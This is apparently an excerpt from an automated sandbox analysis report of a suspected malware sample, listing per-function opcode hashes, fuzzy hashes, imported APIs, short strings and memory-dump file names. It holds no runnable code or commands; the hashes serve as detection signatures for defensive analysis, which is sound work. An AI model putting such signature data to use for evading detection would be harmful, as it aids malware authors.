                                                                                                • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                                                                                • Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
                                                                                                • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                                                                                • Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2162964266-0
                                                                                                • Opcode ID: 3ee8ba8a2f9b3bb34921be715b9eebf8d93374994481696b77743d8556de7eb7
                                                                                                • Instruction ID: bc40f1fef1a9170960cc57993c705059dbee377a108b532450c26420989eb83f
                                                                                                • Opcode Fuzzy Hash: 3ee8ba8a2f9b3bb34921be715b9eebf8d93374994481696b77743d8556de7eb7
                                                                                                • Instruction Fuzzy Hash: ACE2F174A046698FCB65CF69D880BD9B7F1BF89314F2481E9D948A7314D738AE85CF80
                                                                                                APIs
                                                                                                • NtWriteFile.NTDLL ref: 6CFE0E3F
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6CFE0E4F
                                                                                                • RtlNtStatusToDosError.NTDLL ref: 6CFE0E6F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileObjectSingleStatusWaitWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3447438843-0
                                                                                                • Opcode ID: 71f95e4c199b1c4c30354b460a562283c3b8181a6a296b3b9af47aa68571f82d
                                                                                                • Instruction ID: fe3cc13712f35da5b1fdd70c6dd56a92af2b368a0bfc41fb7ff178522f2d08e5
                                                                                                • Opcode Fuzzy Hash: 71f95e4c199b1c4c30354b460a562283c3b8181a6a296b3b9af47aa68571f82d
                                                                                                • Instruction Fuzzy Hash: 62317175508305AFE304CF14C854B9BBBF5EBC8758F10892DF9A497380D7B4A9058B96
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ROWID$rows updated
                                                                                                • API String ID: 0-3149524134
                                                                                                • Opcode ID: 7fc51814d4df85eb7f7c1a496900f899ee2e71b5c20762128eabbebdfffcb40d
                                                                                                • Instruction ID: d39c60c32cc69d7ad3465f9f6cb7242007ae0eab8187012a9ec74863cc1168bc
                                                                                                • Opcode Fuzzy Hash: 7fc51814d4df85eb7f7c1a496900f899ee2e71b5c20762128eabbebdfffcb40d
                                                                                                • Instruction Fuzzy Hash: 5913E474A04259CFEB20CFA8C484B9DBBF1BF89308F208559D899AB355D774E986CF41
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 1475443563-3916222277
                                                                                                • Opcode ID: 28d1f33e7dd264d4a48ffac20ff2b996ab0e707b513a94353eac973f764cc450
                                                                                                • Instruction ID: bfece18307556e4ef4cbbc35f99f21af59f03d97bd6a6be96c4aa07d47f44be4
                                                                                                • Opcode Fuzzy Hash: 28d1f33e7dd264d4a48ffac20ff2b996ab0e707b513a94353eac973f764cc450
                                                                                                • Instruction Fuzzy Hash: 9F82D375E04259CFDB04CFA8C580A8DBBF1BF88308F258569E859AB355D778E946CF80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: d
                                                                                                • API String ID: 0-2564639436
                                                                                                • Opcode ID: 39af19a113e19b71ee75d248144d88124ac87e74ed1a4a7d969078216bc50fcd
                                                                                                • Instruction ID: a6081b29965de0926bd1f9b116bef4fbec5f60393564f64626f3e1bb6397bda8
                                                                                                • Opcode Fuzzy Hash: 39af19a113e19b71ee75d248144d88124ac87e74ed1a4a7d969078216bc50fcd
                                                                                                • Instruction Fuzzy Hash: 5823C374A04259CFDB60DFA8C884B8DBBF1BF88308F2585A9D888AB345D775D985CF41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $`
                                                                                                • API String ID: 0-2069241612
                                                                                                • Opcode ID: 5eadeb913d8a7e32e3fb13a38341bb352b6bba7da8cd378bd3f56dec86492d22
                                                                                                • Instruction ID: f5d1834218b0644dc9413ec29fdd40a604c3a9ef9e80d4570fc6a9fa81371110
                                                                                                • Opcode Fuzzy Hash: 5eadeb913d8a7e32e3fb13a38341bb352b6bba7da8cd378bd3f56dec86492d22
                                                                                                • Instruction Fuzzy Hash: 8562B074A41269CFEB60CF28C980B98BBF5BB48314F5585DAE849A7351D770EE81CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: N$`
                                                                                                • API String ID: 0-1193824278
                                                                                                • Opcode ID: 1695c2255dbd43fefbf3ec3ae884fd43f98a3cc923433ff91cb67868f5529755
                                                                                                • Instruction ID: e8c1d3730f2f7e8f69519fa84ea5dfa2fa83ba7ea746cf6dea917a2a2b262f61
                                                                                                • Opcode Fuzzy Hash: 1695c2255dbd43fefbf3ec3ae884fd43f98a3cc923433ff91cb67868f5529755
                                                                                                • Instruction Fuzzy Hash: 0C323570A44265CFEB21CF58C880B89BBB5BF45358F6582D9D859AB392D370ED81CF90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$BINARY
                                                                                                • API String ID: 0-1556553403
                                                                                                • Opcode ID: dbf5463f1b26696ad097613312d0e8a281b4cdde38a6e2070d2bb0de8395586b
                                                                                                • Instruction ID: e60323d610b5e953cfa2bbac53d573cb4ccd773d83c01c1116e4164fd3caed25
                                                                                                • Opcode Fuzzy Hash: dbf5463f1b26696ad097613312d0e8a281b4cdde38a6e2070d2bb0de8395586b
                                                                                                • Instruction Fuzzy Hash: 5E22E1B4E0425A8FDB04CFA8D480A9DBBF1FF98314F658569E859AB355D734E842CF80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 9ua$BINARY
                                                                                                • API String ID: 0-3775120692
                                                                                                • Opcode ID: 5d1058f1121b4ac832307e0b4c14ecdaa80b0c74fbff9087e03826d3a53d8ce7
                                                                                                • Instruction ID: a257fdc816b75983c87695270593668a71f4eb775f4fb4bb7c1b83965cb32a4b
                                                                                                • Opcode Fuzzy Hash: 5d1058f1121b4ac832307e0b4c14ecdaa80b0c74fbff9087e03826d3a53d8ce7
                                                                                                • Instruction Fuzzy Hash: ED811978A0461A9FDB41CFA9D58079EBBF1BF88758F21C02AEC58AB354D774D841CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: xn--
                                                                                                • API String ID: 0-2826155999
                                                                                                • Opcode ID: 36e2dc768710a6dcfd7f99a75ba5cf08cb9ddc9a20555a2d2f28c9de01ed3b85
                                                                                                • Instruction ID: 570b030b98aa3f30bf4d3afebdbc228d46fd2c91a6e5aaaab05bf1c8014ec7d6
                                                                                                • Opcode Fuzzy Hash: 36e2dc768710a6dcfd7f99a75ba5cf08cb9ddc9a20555a2d2f28c9de01ed3b85
                                                                                                • Instruction Fuzzy Hash: 08A246B2F0526A8ADF04CF64C8A03EFB7F1BF45308F1442AAD45677A81D3356A85CB52
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4
                                                                                                • API String ID: 0-4088798008
                                                                                                • Opcode ID: 69e42c9349b47ab598709cf7bf194c5a9beee1fbfb6073163f528dbfc61e7f72
                                                                                                • Instruction ID: 518d6d0113e266a091a0cbf43dd9b6b92f5400263bfdc1a72100ca210d41eac5
                                                                                                • Opcode Fuzzy Hash: 69e42c9349b47ab598709cf7bf194c5a9beee1fbfb6073163f528dbfc61e7f72
                                                                                                • Instruction Fuzzy Hash: E7C2D274A042598FEB20CFA8C490B9DBBF1BF89308F24C559E855AB390D774E886CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: 48b6196e9fac38c3e88230cedd955c73ebae4f8bcae3e36ccb28a35b721a3cf5
                                                                                                • Instruction ID: b9cfdf9aff36692a2be4ad7309719c75a621d287fa98b86d1028b92f8662c608
                                                                                                • Opcode Fuzzy Hash: 48b6196e9fac38c3e88230cedd955c73ebae4f8bcae3e36ccb28a35b721a3cf5
                                                                                                • Instruction Fuzzy Hash: 83A2F775A04229CFDB25CF68C890B99BBB1BB89304F2584D9D88DA7351DB30EE85CF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: optimize
                                                                                                • API String ID: 0-3797040228
                                                                                                • Opcode ID: f5402574cac30fe7d3fd3d7b5c35659526e9f8efed4e34d94690394b9f3c71d2
                                                                                                • Instruction ID: 746819fbde02672c5e9b0b23433deca564a22272aedf92c5aa0001529aa1c472
                                                                                                • Opcode Fuzzy Hash: f5402574cac30fe7d3fd3d7b5c35659526e9f8efed4e34d94690394b9f3c71d2
                                                                                                • Instruction Fuzzy Hash: ABA2E6B4A043698FDB10DF68C88478DBBF1BF89308F2589A9D889AB344D775D985CF41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BINARY
                                                                                                • API String ID: 0-907554435
                                                                                                • Opcode ID: c8d0b50e4d115d300b53d3cd8d4b46905547811b89af05c61717644106981bf2
                                                                                                • Instruction ID: 1524dd747bf857ec4baaba04828f8d2f29ccbb9c11785f708be4a3eeb89fa39b
                                                                                                • Opcode Fuzzy Hash: c8d0b50e4d115d300b53d3cd8d4b46905547811b89af05c61717644106981bf2
                                                                                                • Instruction Fuzzy Hash: AB92F174A452698FEB60CF28C980B98BBF1BF48314F5485DAD849A7391D774EE81CF90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 1475443563-0
                                                                                                • Opcode ID: 11a0e6a4d076267dca466a296c2d0d8e725e0aa5c18e5fc0149600946a27ef5a
                                                                                                • Instruction ID: 5f607dce3bb248c7bc7ba639c908390524c363e3b0c88829d9203463054831df
                                                                                                • Opcode Fuzzy Hash: 11a0e6a4d076267dca466a296c2d0d8e725e0aa5c18e5fc0149600946a27ef5a
                                                                                                • Instruction Fuzzy Hash: D4E12675A04209CFDB04CFA8D49069EBBF2BF98314F29856AEC54EB346D734E951CB90
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
